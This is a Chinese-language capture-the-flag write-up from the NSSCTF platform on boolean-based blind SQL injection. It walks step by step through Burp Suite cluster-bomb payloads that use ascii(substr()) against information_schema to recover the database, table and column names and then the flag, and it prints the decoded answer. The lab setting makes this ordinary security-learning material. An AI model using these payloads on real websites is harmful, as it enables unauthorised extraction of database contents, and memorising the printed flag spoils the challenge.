NSSCTF 布尔盲注

布尔盲注

彩笔的py代码寄了，只能手注哩。

基本流程

猜库名长度，猜库名，猜表名，猜字段名，截取列中字段

and ascii(substr((select user from users limit 0,1),m,1)) //截取第m个字符串转换为ascii值

猜库名长度
/?id=1 and length(database())=4 --+

猜库名
GET /?id=1%20and%20(ascii(substr(database(),§1§,1))=§1§)%20--+
#burp第一个变量是第几个字符(1开始，抓4个)，第二个变量是ascii码
#test

burpsuite cluster bomb猜表名
?id=1 and (ascii(substr((select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1)))=101-- qwe


?id=1%20and%20(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27test%27%20limit%20§0§,1),§1§,1)))=§101§--%20qwe HTTP/1.1
#burp第一个变量是第几行，第二个变量是第几个字符，第三个变量是ascii码
0

102 f
49 1
97 a
103 g
95 _
116 t
97 a
98 b
108 l 
101 e

1
117 u
115 s
101 e
114 r
115 s

猜字段名
?id=1 and (ascii(substr((select column_name from information_schema.columns where table_name='f1ag_table' limit 0,1),1,1)))=40-- qwe
类似上面的操作可得
105,95,97,109,95,102,49,97,103,95,99,111,108,117,109,110
i_am_f1ag_column


?id=1 and (ascii(substr((select i_am_f1ag_column from f1ag_table limit 0,1),1,1)))=40-- qwe

?id=1%20and%20(ascii(substr((select%20i_am_f1ag_column%20from%20f1ag_table%20limit%200,1),§1§,1)))=§40§--%20qwe HTTP/1.1
#burp第一个变量选第几个字符，第二个变量表示ascii码
78,83,83,67,84,70,123,51,102,52,52,102,99,52,100,45,52,98,56,57,45,52,100,56,48,45,56,57,97,50,45,51,56,102,98,49,51,98,101,101,99,52,55,125
NSSCTF{3f44fc4d-4b89-4d80-89a2-38fb13beec47}

一些链接

SQL注入实战之盲注篇（布尔、时间盲注）随年c

ASCII编码转换，ASCII码在线查询工具 (qqxiuzi.cn)